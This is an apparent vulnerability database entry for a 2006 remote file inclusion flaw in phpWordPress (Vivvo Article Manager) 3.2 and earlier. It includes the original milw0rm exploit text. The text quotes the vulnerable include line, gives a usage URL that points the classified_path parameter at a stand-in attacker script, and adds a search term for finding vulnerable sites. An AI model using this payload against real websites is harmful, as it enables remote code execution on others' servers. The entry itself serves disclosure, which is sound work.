MercilessTurk

vendor:

phpWordPress (Vivvo Article Manager)

by:

MercilessTurk

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: phpWordPress (Vivvo Article Manager)

Affected Version From: <=3.2

Affected Version To: <=3.2

Patch Exists: YES

Related CWE: N/A

CPE: a:vivvo.net:phpwordpress

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

The vulnerability exists due to the use of user-supplied input in the 'classified_path' parameter of the 'HTML_Category_Menu()' function in 'HTML_function.php' without proper validation. This can be exploited to include arbitrary files from remote locations by supplying an URL in the 'classified_path' parameter.

Mitigation:

Input validation should be performed to ensure that input data is properly sanitized.

Source

Exploit-DB raw data:

#########################################################################
#MercilessTurk info@kahramanhost.com
#########################################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
#########################################################################
#Vulnerable Code in HTML_function.php function HTML_Category_Menu() :
#line 51: include_once($classified_path.'export_category.php');
#if register_globals = On then this code can include $_GET['classified_path']
#in index.php HTML_Category_Menu() function is called:
#line 45:
#$box_sections_HTML=HTML_Category_Menu();
#########################################################################
#Usage:
#http://[target]/[path]/index.php?classified_path=http://[evil_script]?
#########################################################################
#For google searching:Vivvo Article Manager
#########################################################################
#Greetz: sanaldarbe.com members.
#########################################################################

# milw0rm.com [2006-09-09]